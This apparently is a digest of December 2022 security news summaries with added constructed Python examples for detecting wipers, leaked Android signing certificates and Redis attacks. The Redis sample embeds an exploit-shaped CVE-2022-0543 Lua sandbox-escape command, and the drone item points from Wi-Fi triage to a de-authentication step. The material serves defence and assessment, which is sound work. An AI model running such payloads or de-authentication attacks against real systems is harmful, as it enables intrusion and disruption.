                Autosummary: Finally, the wiper will corrupt all enumerated files except for ".exe", ".dll", "lnk", ".sys", ".msi", and its own ".CRY", while also skipping System, Windows, and Boot directories to prevent rendering the computer completely unusable. "
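                The targeting rules quoted above (skip executables, libraries, shortcuts, drivers, installers and the wiper's own ".CRY" files; skip the System, Windows and Boot directories) are also a detection opportunity: a process that modifies a burst of exactly the files a wiper would touch, or that renames anything to ".CRY", is worth an alert. The following is an added example, not code from the article or from the malware analysis it reports on. The file-event records are constructed (Sysmon-style timestamp, pid, image, operation, path), the directory match on any path component and the thresholds are assumptions to tune against your own telemetry.

```python
"""Detection modelled on the reported CryWiper targeting rules (added example; constructed data)."""
from collections import defaultdict
from datetime import datetime, timedelta
from pathlib import PureWindowsPath

# Extensions the wiper is reported to leave alone, plus the extension it gives corrupted files.
SKIPPED_EXTENSIONS = {".exe", ".dll", ".lnk", ".sys", ".msi", ".cry"}
# Directories it skips so the host still boots; matched on any path component (assumption).
SKIPPED_DIRECTORIES = {"system", "windows", "boot"}
WIPER_MARKER_EXTENSION = ".cry"


def is_wiper_target(path: str) -> bool:
    """True if a file would be corrupted under the reported targeting rules."""
    p = PureWindowsPath(path)
    if p.suffix.lower() in SKIPPED_EXTENSIONS:
        return False
    return not any(part.lower() in SKIPPED_DIRECTORIES for part in p.parts[:-1])


def detect_mass_corruption(events, threshold=20, window=timedelta(seconds=60)):
    """Flag processes that modify many wipeable files in a short window, or rename files to .CRY.

    events: iterable of (timestamp, pid, image, op, path); op is "write", "rename" or "delete",
    and for renames `path` is the new name. Returns {(pid, image): summary} for flagged processes.
    """
    per_proc = defaultdict(list)
    for ts, pid, image, op, path in events:
        per_proc[(pid, image)].append((ts, op, path))

    hits = {}
    for key, evs in per_proc.items():
        evs.sort()
        cry_renames = sum(
            1 for _, op, path in evs
            if op == "rename" and path.lower().endswith(WIPER_MARKER_EXTENSION)
        )
        recent = []  # (timestamp, path) of targetable modifications inside the sliding window
        peak = 0
        for ts, op, path in evs:
            if op not in ("write", "rename") or not is_wiper_target(path):
                continue
            recent.append((ts, path))
            while ts - recent[0][0] > window:
                recent.pop(0)
            peak = max(peak, len({p for _, p in recent}))
        if peak >= threshold or cry_renames:
            hits[key] = {
                "peak_files_in_window": peak,
                "cry_renames": cry_renames,
                "first_seen": evs[0][0],
                "last_seen": evs[-1][0],
            }
    return hits


def build_sample_events():
    """Constructed telemetry: a slow backup job, and one process sweeping a user's documents."""
    t0 = datetime(2022, 12, 1, 9, 0, 0)
    events = []
    # Benign: a backup agent rewriting five files over ten minutes.
    for i in range(5):
        events.append((t0 + timedelta(minutes=2 * i), 1200, "backup.exe", "write",
                       rf"D:\backups\set{i}.bak"))
    # Malicious: 25 documents corrupted and renamed within 25 seconds.
    for i in range(25):
        ts = t0 + timedelta(seconds=i)
        events.append((ts, 4410, "browserupdate.exe", "write", rf"C:\Users\anna\Documents\q{i}.xlsx"))
        events.append((ts, 4410, "browserupdate.exe", "rename", rf"C:\Users\anna\Documents\q{i}.xlsx.CRY"))
    # The same process touching files the wiper skips; these must not inflate the count.
    events.append((t0, 4410, "browserupdate.exe", "write", r"C:\Windows\Temp\stage.dll"))
    events.append((t0, 4410, "browserupdate.exe", "write", r"C:\Users\anna\Desktop\tool.exe"))
    return events


if __name__ == "__main__":
    for (pid, image), summary in detect_mass_corruption(build_sample_events()).items():
        print(f"ALERT pid={pid} image={image} {summary}")
```

The exclusion list also tells you where canary files belong: a decoy ".docx" or ".xlsx" in a user profile will be hit, a decoy ".exe" in C:\Windows never will.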


                Hackers Sign Android Malware Apps with Compromised Platform Certificates

                exploits
                2022-12-02 https://thehackernews.com/2022/12/hackers-sign-android-malware-apps-with.html
                Platform certificates used by Android smartphone vendors like Samsung, LG, and MediaTek have been found to be abused to sign malicious apps. The findings were first discovered and reported by Google reverse engineer Łukasz Siewierski on Thursday. "A platform certificate is the application signing certificate used to sign the "android" application on the system image," a report filed through the "

                Autosummary: Package names found signed with the leaked platform certificates: com.android.power, com.management.propaganda, com.sec.android.musicplayer, com.houla.quicken, com.attd.da, com.arlo.fappx, com.metasploit.stage, com.vantage.ectronic.cornmuni. That said, it's not immediately clear how and where these artifacts were found, and if they were used as part of any active malware campaign. "
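                What makes this leak serious is the definition quoted above: the platform certificate signs the "android" package on the system image, so any APK signed with the same key can ask to run as the same highly privileged system user. Two checks a responder can run today, as an added example that serves this item and the two BleepingComputer items above (it is not code from Google's report or from the articles): match the installed package list from `adb shell pm list packages -f` against the package names reported above, and match the signer fingerprint printed by `apksigner verify --print-certs <apk>` against a list of leaked certificates. Both tool outputs embedded below are constructed, and the digest in LEAKED_CERT_SHA256 is a placeholder to be replaced with the fingerprints published for the leaked certificates.

```python
"""Check installed packages and an APK's signer against platform-certificate leak indicators
(added example; constructed tool output, placeholder digests)."""
import re

# Package names the report lists as signed with leaked platform certificates (from the article).
SUSPICIOUS_PACKAGES = {
    "com.android.power", "com.management.propaganda", "com.sec.android.musicplayer",
    "com.houla.quicken", "com.attd.da", "com.arlo.fappx", "com.metasploit.stage",
    "com.vantage.ectronic.cornmuni",
}

# Placeholder digests (assumption for this example): replace with the SHA-256 fingerprints
# published for the leaked certificates. Lowercase hex, no separators.
LEAKED_CERT_SHA256 = {
    "00" * 32: "placeholder: leaked OEM platform certificate",
}

_DIGEST_RE = re.compile(r"Signer #(\d+) certificate (SHA-256|SHA-1|MD5) digest:\s*([0-9a-fA-F]+)")


def parse_pm_list_packages(output: str) -> set:
    """Parse `adb shell pm list packages [-f]`: one `package:[<apk path>=]<name>` per line."""
    names = set()
    for line in output.splitlines():
        line = line.strip()
        if line.startswith("package:"):
            names.add(line[len("package:"):].rsplit("=", 1)[-1])
    return names


def parse_apksigner_certs(output: str) -> dict:
    """Parse `apksigner verify --print-certs <apk>` into {signer_index: {algorithm: digest}}."""
    signers = {}
    for m in _DIGEST_RE.finditer(output):
        signers.setdefault(int(m.group(1)), {})[m.group(2)] = m.group(3).lower()
    return signers


def find_suspicious_packages(pm_output: str) -> list:
    """Installed package names that match the reported malware package list."""
    return sorted(parse_pm_list_packages(pm_output) & SUSPICIOUS_PACKAGES)


def find_leaked_signers(apksigner_output: str, leaked=LEAKED_CERT_SHA256) -> list:
    """(signer index, digest, label) for each signer whose SHA-256 is a known leaked certificate."""
    hits = []
    for idx, digests in sorted(parse_apksigner_certs(apksigner_output).items()):
        sha256 = digests.get("SHA-256")
        if sha256 in leaked:
            hits.append((idx, sha256, leaked[sha256]))
    return hits


# Constructed `pm list packages -f` output.
SAMPLE_PM_OUTPUT = """package:/system/priv-app/Settings/Settings.apk=com.android.settings
package:/data/app/~~abc==/com.metasploit.stage-1/base.apk=com.metasploit.stage
package:/data/app/~~def==/com.example.notes-2/base.apk=com.example.notes
"""

# Constructed `apksigner verify --print-certs` output whose signer matches the placeholder digest.
SAMPLE_APKSIGNER_OUTPUT = """Verifies
Verified using v1 scheme (JAR signing): true
Verified using v2 scheme (APK Signature Scheme v2): true
Number of signers: 1
Signer #1 certificate DN: CN=Android, OU=Android, O=Android, L=Mountain View, ST=California, C=US
Signer #1 certificate SHA-256 digest: 0000000000000000000000000000000000000000000000000000000000000000
Signer #1 certificate SHA-1 digest: 0000000000000000000000000000000000000000
Signer #1 certificate MD5 digest: 00000000000000000000000000000000
"""

if __name__ == "__main__":
    print("suspicious packages:", find_suspicious_packages(SAMPLE_PM_OUTPUT))
    print("leaked signers:", find_leaked_signers(SAMPLE_APKSIGNER_OUTPUT))
```

A package-name match is weak evidence on its own (names are trivially reused); a signer digest match is the one that matters, and the APK to feed apksigner is the path `pm list packages -f` prints before the `=`.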


                CISA Warns of Multiple Critical Vulnerabilities Affecting Mitsubishi Electric PLCs

                industry
                2022-12-02 https://thehackernews.com/2022/12/cisa-warns-of-multiple-critical.html
                The U.S. Cybersecurity and Infrastructure Security Agency (CISA) this week released an Industrial Control Systems (ICS) advisory warning of multiple vulnerabilities in Mitsubishi Electric GX Works3 engineering software. "Successful exploitation of these vulnerabilities could allow unauthorized users to gain access to the MELSEC iQ-R/F/L series CPU modules and the MELSEC iQ-R series OPC UA server "

                Autosummary: "


                Hackers Exploiting Redis Vulnerability to Deploy New Redigo Malware on Servers

                exploits
                2022-12-02 https://thehackernews.com/2022/12/hackers-exploiting-redis-vulnerability.html
                A previously undocumented Go-based malware is targeting Redis servers with the goal of taking control of the infected systems and likely building a botnet network. The attacks involve taking advantage of a critical security vulnerability in the open source, in-memory, key-value store that was disclosed earlier this year to deploy Redigo, according to cloud security firm Aqua. "

                Autosummary: "


                The Week in Ransomware - December 2nd 2022 - Disrupting Health Care

                exploits ransomware
                2022-12-02 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-december-2nd-2022-disrupting-health-care/
                This week's big news was the Colombia health system being severely disrupted by a ransomware attack on Keralty, one of the country's largest healthcare providers. [...] "

                Autosummary: Contributors and those who provided new ransomware information and stories this week include: @BleepinComputer, @LawrenceAbrams, @FourOctets, @demonslay335, @struppigel, @PolarToffee, @serghei, @fwosar, @DanielGallagher, @jorntvdw, @billtoulas, @Seifreed, @VK_Intel, @malwareforme, @malwrhunterteam, @Ionut_Ilascu, @kaspersky, @xfalexx,@hyperconectado, @kennethdee, @pcrisk, @pushecx, and @BrettCallow. "


                Google Chrome emergency update fixes 9th zero-day of the year

                exploits
                2022-12-02 https://www.bleepingcomputer.com/news/security/google-chrome-emergency-update-fixes-9th-zero-day-of-the-year/
                Google has released Chrome 108.0.5359.94/.95 for Windows, Mac, and Linux users to address a single high-severity security flaw, the ninth Chrome zero-day exploited in the wild patched since the start of the year. [...] "

                Autosummary: "


                Attack of drones: airborne cybersecurity nightmare

                ciber
                2022-12-02 https://securityaffairs.co/wordpress/139196/hacking/drones-abuse.html

                Threat actors could exploit drones for payload delivery, kinetic operations, and even diversion, experts warn. Original post at hxxps://cybernews.com/security/drones-hack-airborne-cybersecurity-nightmare/ Once a niche technology, drones are about to explode in terms of market growth and enterprise adoption. Naturally, threat actors follow the trend and exploit the technology for surveillance, payload delivery, kinetic operations, and even diversion. […]

                The post Attack of drones: airborne cybersecurity nightmare appeared first on Security Affairs.

                "

                Autosummary: This article is going to explore cybersecurity considerations surrounding drone platforms through an initial review of drone market trends, popular drone hacking tools, and general drone hacking techniques that may be used to compromise enterprise drone platforms, including how drone platforms themselves may be used as malicious hacking platforms. Common attacks against enterprise drones include platform takeover, where an attacker uses RF, Wi-Fi or a subscription service like Aerial Armor to detect flight paths of a drone in a geographical area, performs de-authentication attacks, takes over control of the drone and lands the stolen drone in a location of their choosing. Using the monitored interface from the Dronesploit example, aspects of Aircrack-ng can be used to perform several useful drone security tests, including identification of wireless drone networks, de-authentication of connected devices like a drone controller, or cracking of the WEP/WPA keys. Further considerations must be taken to secure onboard storage of the drone, ensure routes drones travel are relatively safe (i.e., free from obstacles, sparsely populated, etc.) and that Wi-Fi or Radio Frequency (RF) signals used by drone platforms are properly encrypted against eavesdropping or manipulation. The below example shows how the “airodump-ng wlan0” command is useful for identifying nearby drone Wi-Fi signals, including the MAC address of the broadcasting device, the network encryption scheme, and the wireless authentication standard used by the drone. "
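                The airodump-ng step described above, as an added example that is not part of the original article: when airodump-ng is run with `-w <prefix>` against a monitor-mode interface it also writes `<prefix>-01.csv`, and that file is the practical input for triage. The parser below reads the access-point section of that CSV and flags networks with no encryption or WEP (the ones whose control traffic can be read or whose key can be cracked) and networks whose SSID looks like a drone link. The capture embedded here is constructed, and the SSID prefixes in DRONE_SSID_PREFIXES are an assumption to replace with the vendors expected on site.

```python
"""Triage of an airodump-ng CSV dump for drone assessments (added example; constructed capture)."""
import csv
import io
from dataclasses import dataclass

# SSID prefixes treated as drone-like here: an assumption for the example, tune per engagement.
DRONE_SSID_PREFIXES = ("DRONE", "UAV", "RC-", "QUAD")


@dataclass
class AccessPoint:
    bssid: str
    channel: int
    privacy: str   # OPN, WEP, WPA, WPA2 ... exactly as airodump-ng reports it
    cipher: str
    auth: str
    power: int
    essid: str


def parse_airodump_csv(text: str) -> list:
    """Return the access-point rows of an airodump-ng `<prefix>-01.csv` file.

    The file has two comma-separated sections split by a blank line: access points,
    then stations. Only the access-point section is used here.
    """
    ap_section = text.replace("\r\n", "\n").strip().split("\n\n")[0]
    reader = csv.reader(io.StringIO(ap_section), skipinitialspace=True)
    header = [h.strip() for h in next(reader)]
    aps = []
    for row in reader:
        if not row or not row[0].strip():
            continue
        rec = dict(zip(header, (v.strip() for v in row)))
        aps.append(AccessPoint(
            bssid=rec["BSSID"], channel=int(rec["channel"]), privacy=rec["Privacy"],
            cipher=rec["Cipher"], auth=rec["Authentication"], power=int(rec["Power"]),
            essid=rec["ESSID"],
        ))
    return aps


def triage(aps, drone_prefixes=DRONE_SSID_PREFIXES):
    """Return (bssid, essid, reasons) for APs with weak link security or drone-like SSIDs."""
    findings = []
    for ap in aps:
        reasons = []
        if ap.privacy in ("OPN", "WEP"):
            reasons.append(f"link security is {ap.privacy}: traffic readable or key crackable")
        if ap.essid.upper().startswith(drone_prefixes):
            reasons.append("SSID matches a drone naming pattern")
        if reasons:
            findings.append((ap.bssid, ap.essid, reasons))
    return findings


# Constructed `<prefix>-01.csv` content in airodump-ng's layout (a WPA2 office AP,
# a WEP drone link and an open drone controller network, then one associated station).
SAMPLE_CSV = """
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:00:00:01, 2022-12-01 10:00:00, 2022-12-01 10:05:00,  6,  54, WPA2, CCMP, PSK, -45,  120,    0,   0.  0.  0.  0,  11, OfficeGuest, 
AA:BB:CC:00:00:02, 2022-12-01 10:00:12, 2022-12-01 10:05:00,  1,  11, WEP , WEP , OPN, -60,   40, 3021,   0.  0.  0.  0,   9, DRONE-7A2, 
AA:BB:CC:00:00:03, 2022-12-01 10:01:30, 2022-12-01 10:05:00, 11,  54, OPN , ,    , -71,   15,    0,   0.  0.  0.  0,   8, UAV-CTRL, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
DE:AD:BE:EF:00:01, 2022-12-01 10:00:30, 2022-12-01 10:05:00, -50,  230, AA:BB:CC:00:00:02, DRONE-7A2
"""

if __name__ == "__main__":
    for bssid, essid, reasons in triage(parse_airodump_csv(SAMPLE_CSV)):
        print(f"{bssid} {essid!r}: " + "; ".join(reasons))
```

The BSSID of a flagged network is what the de-authentication step needs next (aireplay-ng takes it as the `-a` target), so keep the parsed output rather than retyping it from the terminal view.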


                Time to uninstall! Abandoned Android apps pack a vulnerability punch

                exploits
                2022-12-02 https://www.malwarebytes.com/blog/news/2022/12/abandoned-android-apps-pack-a-vulnerability-punch

                Categories: News

                Tags: CVE, android, apps, abandonware, vulnerability, bug, telepad, pc keyboard, lazy mouse

                Three abandoned Android apps with remote code execution vulnerabilities need to be shown the door.

                (Read more...)

                The post Time to uninstall! Abandoned Android apps pack a vulnerability punch appeared first on Malwarebytes Labs.

                "

                Autosummary: Telepad versions 1.0.7 and prior Lazy Mouse versions 2.0.1 and prior PC Keyboard versions 30 and prior The three apps are reported to be abandonware, which makes it even more essential to get word out with regard to the security issues at hand. The other three are CVE-2022-45478, CVE-2022-45480, and CVE-2022-45483 respectively, which all involve machine-in-the-middle attacks and reading all keypresses in cleartext. "


                CISA and the FBI issue alert about Cuba ransomware

                exploits ransomware
                2022-12-02 https://www.malwarebytes.com/blog/news/2022/12/cisa-and-fbi-issue-alert-about-cuba-ransomware

                Categories: News, Ransomware

                Tags: Cuba ransomware, ransomware, double extortion, Cybersecurity Advisory, CSA, CISA, FBI

                Cuba ransomware is spotlighted in a recent cybersecurity advisory (CSA) in the ongoing #StopRansomware campaign spearheaded by CISA and the FBI.

                (Read more...)

                The post CISA and the FBI issue alert about Cuba ransomware appeared first on Malwarebytes Labs.

                "

                Autosummary: Like other ransomware groups, its threat actors use double extortion tactics, predominantly targeting organizations in the US in five critical infrastructure sectors: critical manufacturing, financial services, government facilities, healthcare and public health, and information technology. Various IOCs (associated files, email addresses, a Jabber address, IP addresses, Bitcoin wallets, and ransom notes) and MITRE ATT&CK techniques are also found on that page. "


                Cybersecurity engineering under the Federal Trade Commission

                ciber
                2022-12-01 https://www.helpnetsecurity.com/2022/12/01/ftc-privacy/

                When the Federal Trade Commission (FTC) releases new regulations or changes to existing ones, the implications may not be obvious to the average business or company employees. The FTC and privacy The FTC is a federal agency that protects consumers from fraudulent, deceptive, and unfair business practices. The Commission, often in collaboration with other regulatory agencies such as the United States Department of Justice and Attorney General, has enforcement authority and other responsibilities under more … More

                The post Cybersecurity engineering under the Federal Trade Commission appeared first on Help Net Security.

                "

                Autosummary: To accomplish the safeguard rule: 1. Design an information security program containing “administrative, technical, and physical safeguards” to protect the security, confidentiality, and integrity of customer personal information, including both electronic and paper records. The FTC has used its authority to promulgate specific privacy-focused rules, including the Health Breach Notification Rule (HBN Rule), the Standards for Safeguarding Customer Information under the Gramm-Leach-Bliley Act (Safeguards Rule), the Children’s Online Privacy Protection Act (COPPA) and the Fair Credit Reporting Act. 4. Provide customers with clear and conspicuous privacy notices that include information collected, with whom it may be shared, how information is protected, and an explanation of the opt-out policy. "


                Researchers Disclose Critical RCE Vulnerability Affecting Quarkus Java Framework

                exploits
                2022-12-01 https://thehackernews.com/2022/12/researchers-disclose-critical-rce.html
                A critical security vulnerability has been disclosed in the Quarkus Java framework that could be potentially exploited to achieve remote code execution on affected systems. Tracked as CVE-2022-4116 (CVSS score: 9.8), the shortcoming could be trivially abused by a malicious actor without any privileges. "The vulnerability is found in the Dev UI Config Editor, which is vulnerable to drive-by "

                Autosummary: "


                Schoolyard Bully Trojan Apps Stole Facebook Credentials from Over 300,000 Android Users

                exploits
                2022-12-01 https://thehackernews.com/2022/12/schoolyard-bully-trojan-apps-stole.html
                More than 300,000 users across 71 countries have been victimized by a new Android threat campaign called the Schoolyard Bully Trojan. Mainly designed to steal Facebook credentials, the malware is camouflaged as legitimate education-themed applications to lure unsuspecting users into downloading them. The apps, which were available for download from the official Google Play Store, have now been "

                Autosummary: "


                New DuckLogs malware service claims having thousands of ‘customers’

                exploits
                2022-12-01 https://www.bleepingcomputer.com/news/security/new-ducklogs-malware-service-claims-having-thousands-of-customers-/
                A new malware-as-a-service (MaaS) operation named "DuckLogs" has emerged, giving low-skilled attackers easy access to multiple modules to steal information, log key strokes, access clipboard data, and remote access to the compromised host. [...] "

                Autosummary: Below is a list of some of the data and applications the info-stealing component targets: Hardware and software information Files stored in local disks Account credentials and cookies stored in web browsers Thunderbird and Outlook emails Discord, Telegram, Signal, and Skype messaging data NordVPN, ProtonVPN, OpenVPN, and CrypticVPN account data FileZilla and TotalCommander data Steam, Minecraft, Battle. "


                Hyundai app bugs allowed hackers to remotely unlock, start cars

                exploits
                2022-12-01 https://www.bleepingcomputer.com/news/security/hyundai-app-bugs-allowed-hackers-to-remotely-unlock-start-cars/
                Vulnerabilities in mobile apps exposed Hyundai and Genesis car models after 2012 to remote attacks that allowed unlocking and even starting the vehicles. [...] "

                Autosummary: Yuga Labs analysts found that the mobile apps for Acura, BMW, Honda, Hyundai, Infiniti, Jaguar, Land Rover, Lexus, Nissan, Subaru, and Toyota use SiriusXM technology to implement remote vehicle management features. Security researchers at Yuga Labs found the issues and explored similar attack surfaces in the SiriusXM "smart vehicle" platform used in cars from other makers (Toyota, Honda, FCA, Nissan, Acura, and Infiniti) that allowed them to "remotely unlock, start, locate, flash, and honk" them. "


                ImmuniWeb launches service for discovery and take down of phishing websites

                financial
                2022-12-01 https://www.helpnetsecurity.com/2022/12/01/immuniweb-phishing-websites-takedown-service/

                ImmuniWeb has launched the new Discovery Phishing Websites Takedown service which takes down malicious and phishing websites in just one click to reduce the risks of surging phishing campaigns that aptly exploit human error. Both the number and success rate of phishing attacks are skyrocketing: 74% of organizations fell victim to successful phishing attacks last year, whilst 54% of the phishing incidents led to a compromise of customer data or other sensitive information. To tackle … More

                The post ImmuniWeb launches service for discovery and take down of phishing websites appeared first on Help Net Security.

                "

                Autosummary: Additionally, all customers of ImmuniWeb Discovery with Dark Web monitoring in their subscription will now have access to malware logs with sensitive data stolen from their compromised devices when the former become accessible on the Dark Web. Given that many companies still encourage working from home, preventing attacks on corporate devices located outside of the office is not an easy task, let alone monitoring personal devices that may also contain sensitive corporate data. "


                Google Accuses Spanish Spyware Vendor of Exploiting Chrome, Firefox, and Windows Zero-Days

                exploits
                2022-12-01 https://thehackernews.com/2022/12/google-accuses-spanish-spyware-vendor.html
                A Barcelona-based surveillanceware vendor named Variston IT is said to have surreptitiously planted spyware on targeted devices by exploiting several zero-day flaws in Google Chrome, Mozilla Firefox, and Windows, some of which date back to December 2018. "Their Heliconia framework exploits n-day vulnerabilities in Chrome, Firefox, and Microsoft Defender, and provides all the tools necessary to "

                Autosummary: Variston, which has a bare-bones website, claims to "offer tailor made Information Security Solutions to our customers," "design custom security patches for any kind of proprietary system," and support the "the discovery of digital information by [law enforcement agencies]," among other services. "


                Hackers Leak Another Set of Medibank Customer Data on the Dark Web

                financial
                2022-12-01 https://thehackernews.com/2022/12/hackers-leak-another-set-of-medibank.html
                Medibank on Thursday confirmed that the threat actors behind the devastating cyber attack have posted another dump of data stolen from its systems on the dark web after its refusal to pay a ransom. "We are in the process of analyzing the data, but the data released appears to be the data we believed the criminal stole," the Australian health insurer said. "While our investigation continues there "

                Autosummary: "


                3 of the Worst Data Breaches in the World That Could Have Been Prevented

                financial
                2022-12-01 https://securityaffairs.co/wordpress/139160/data-breach/worst-data-breaches.html

                Data breaches can be devastating for organizations, these are 3 of the worst incidents that could have been prevented Data breaches can be devastating for organizations and even entire countries. Eliminating the risk of a data breach is nearly impossible, but some things can be done to reduce it significantly. Here are three of the […]

                The post 3 of the Worst Data Breaches in the World That Could Have Been Prevented appeared first on Security Affairs.

                "

                Autosummary: Here are some of them: Strong encryption Strong password policy for employees Third-party risk management Educate employees about cyber risks About the Author: Anas Baig With a passion for working on disruptive products, Anas Baig is currently working as a Product Lead at the Silicon Valley based company – Securiti.ai. Here are three of the worst data breaches that could have been avoided: Yahoo In 2013, Yahoo suffered one of the worst data breaches in history, exposing over 3 billion user accounts. "


                FBI: Cuba ransomware raked in $60 million from over 100 victims

                exploits ransomware
                2022-12-01 https://www.bleepingcomputer.com/news/security/fbi-cuba-ransomware-raked-in-60-million-from-over-100-victims/
                The FBI and CISA revealed in a new joint security advisory that the Cuba ransomware gang raked in over $60 million in ransoms as of August 2022 after breaching more than 100 victims worldwide. [...] "

                Autosummary: Useful information that could help identify the ransomware gang's members and the cybercriminals they work with includes "boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with ransomware actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. "


                Unpatched Redis servers targeted in new Redigo malware attacks

                exploits
                2022-12-01 https://www.bleepingcomputer.com/news/security/unpatched-redis-servers-targeted-in-new-redigo-malware-attacks/
                A new Go-based malware threat that researchers call Redigo has been targeting Redis servers vulnerable to CVE-2022-0543 to plant a stealthy backdoor and allow command execution. [...] "

                Autosummary: Redigo malware functions (AquaSec) AquaSec says it's likely that the ultimate goal of Redigo is to add the vulnerable server as a bot in a network for distributed denial-of-service (DDoS) attacks or to run cryptocurrency miners on the compromised systems. "


                AA22-335A: #StopRansomware: Cuba Ransomware

                exploits ransomware
                2022-12-01 https://us-cert.cisa.gov/ncas/alerts/aa22-335a
                Original release date: December 1, 2022

                Summary

                Actions to take today to mitigate cyber threats from ransomware:

                • Prioritize remediating known exploited vulnerabilities.
                • Train users to recognize and report phishing attempts.
                • Enable and enforce phishing-resistant multifactor authentication.

                Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

                The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint CSA to disseminate known Cuba ransomware IOCs and TTPs associated with Cuba ransomware actors identified through FBI investigations, third-party reporting, and open-source reporting. This advisory updates the December 2021 FBI Flash: Indicators of Compromise Associated with Cuba Ransomware.

                Note: While this ransomware is known by industry as “Cuba ransomware,” there is no indication Cuba ransomware actors have any connection or affiliation with the Republic of Cuba. 

                Since the release of the December 2021 FBI Flash, the number of U.S. entities compromised by Cuba ransomware has doubled, with ransoms demanded and paid on the increase.

                This year, Cuba ransomware actors have added to their TTPs, and third-party and open-source reports have identified "

                Autosummary: Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI or CISA. Technical Details Mitigations FBI and CISA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the risk of compromise by Cuba ransomware: Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud). REPORTING FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with ransomware actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. This year, Cuba ransomware actors have added to their TTPs, and third-party and open-source reports have identified a possible link between Cuba ransomware actors, RomCom Remote Access Trojan (RAT) actors, and Industrial Spy ransomware actors. to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud). with password logins (e.g., service account, admin accounts, and domain admin accounts) with National Institute for Standards and Technology (NIST) standards for developing and managing password policies. "


                Android malware infected 300,000 devices to steal Facebook accounts

                exploits
                2022-12-01 https://www.bleepingcomputer.com/news/security/android-malware-infected-300-000-devices-to-steal-facebook-accounts/
                An Android malware campaign masquerading as reading and education apps has been underway since 2018, attempting to steal Facebook account credentials from infected devices. [...] "

                Autosummary: "


                New Redigo malware drops stealthy backdoor on Redis servers

                exploits
                2022-12-01 https://www.bleepingcomputer.com/news/security/new-redigo-malware-drops-stealthy-backdoor-on-redis-servers/
                A new Go-based malware threat that researchers call Redigo has been targeting Redis servers vulnerable to CVE-2022-0543 to plant a stealthy backdoor and allow command execution. [...]

                Autosummary: (Figure: Redigo malware functions, AquaSec.) AquaSec says it's likely that the ultimate goal of Redigo is to add the vulnerable server as a bot in a network for distributed denial-of-service (DDoS) attacks or to run cryptocurrency miners on the compromised systems.


                Top tips to save energy used by your electronic devices

                industry
                2022-12-01 https://www.welivesecurity.com/2022/12/01/top-tips-save-energy-electronic-devices/

                With rapidly rising energy prices putting a strain on many households, what are some quick wins to help reduce the power consumption of your gadgets?

                The post Top tips to save energy used by your electronic devices appeared first on WeLiveSecurity

                Autosummary: Use laptops rather than desktop computers, as they use less energy, according to the US government. With inflation starting to hit home and bills on the rise across Europe, consumers in some countries are being asked by their governments to cut back on energy use where possible amid fears of power blackouts. Here are some ideas: if you're on the hunt for new gadgets, look for energy-efficient kit by checking for Energy Star accreditation and/or a good rating on the EU's energy labelling scheme.


                New Go-based Redigo malware targets Redis servers

                exploits
                2022-12-01 https://securityaffairs.co/wordpress/139164/malware/redigo-malware-targets-redis-servers.html

                Redigo is a new Go-based malware employed in attacks against Redis servers affected by the CVE-2022-0543 vulnerability. Researchers from security firm AquaSec discovered the malware while tracking a campaign targeting Redis servers. Threat actors are exploiting the critical vulnerability, tracked as CVE-2022-0543, in Redis (Remote Dictionary Server) servers. […]

                The post New Go-based Redigo malware targets Redis servers appeared first on Security Affairs.

                Autosummary: The attack chain starts with scans for Redis servers exposing port 6379 to the internet; the threat actors then attempt to connect and run Redis commands, starting with INFO, which returns details about the Redis server such as its version and host OS.
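The two Redigo items above describe the same opening sequence: a scan for Redis exposed on TCP 6379, a connection, an INFO command for reconnaissance, and then exploitation of CVE-2022-0543 (a Lua sandbox escape in the Debian and Ubuntu Redis packages, where the Lua `package` library is reachable from a script). As an added example, not code from Aqua or from either article, the following Python script runs that detection logic over a constructed sample of Redis MONITOR-format output. The sample lines, the allowed-network list and the exploit-like EVAL string are assumptions for illustration only; the EVAL string merely mimics the documented shape of the CVE-2022-0543 abuse.

```python
import ipaddress
import re
import shlex
from collections import defaultdict

# Constructed sample in the format of Redis MONITOR output; not a real capture.
# 203.0.113.0/24 is a documentation range standing in for an internet client.
# The EVAL from that client mimics the public shape of the CVE-2022-0543 abuse:
# on affected builds the Lua 'package' library is reachable from a script.
SAMPLE_MONITOR = """\
1669900001.100000 [0 10.0.0.7:41002] "GET" "session:42"
1669900002.200000 [0 203.0.113.9:53210] "INFO"
1669900003.300000 [0 203.0.113.9:53210] "EVAL" "local io = package.loadlib('liblua5.1.so.0', 'luaopen_io')(); return io.popen('id'):read('*a')" "0"
1669900004.400000 [0 10.0.0.7:41002] "EVAL" "return redis.call('incr', KEYS[1])" "1" "counter"
"""

MONITOR_RE = re.compile(
    r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<ip>[^\]:]+):(?P<port>\d+)\] (?P<rest>.*)$'
)

# Networks whose clients are expected to talk to Redis at all (an assumption
# for the example; adjust to your own address plan).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

# Lua names a Redis script should never be able to reach. On the affected
# Debian/Ubuntu packages (CVE-2022-0543) 'package' is exposed, and through it
# the io/os libraries can be loaded to run OS commands.
ESCAPE_PATTERNS = {
    "package library reachable": re.compile(r"\bpackage\b"),
    "io.popen": re.compile(r"\bio\.popen\b"),
    "os.execute": re.compile(r"\bos\.execute\b"),
    "loadstring": re.compile(r"\bloadstring\b"),
}


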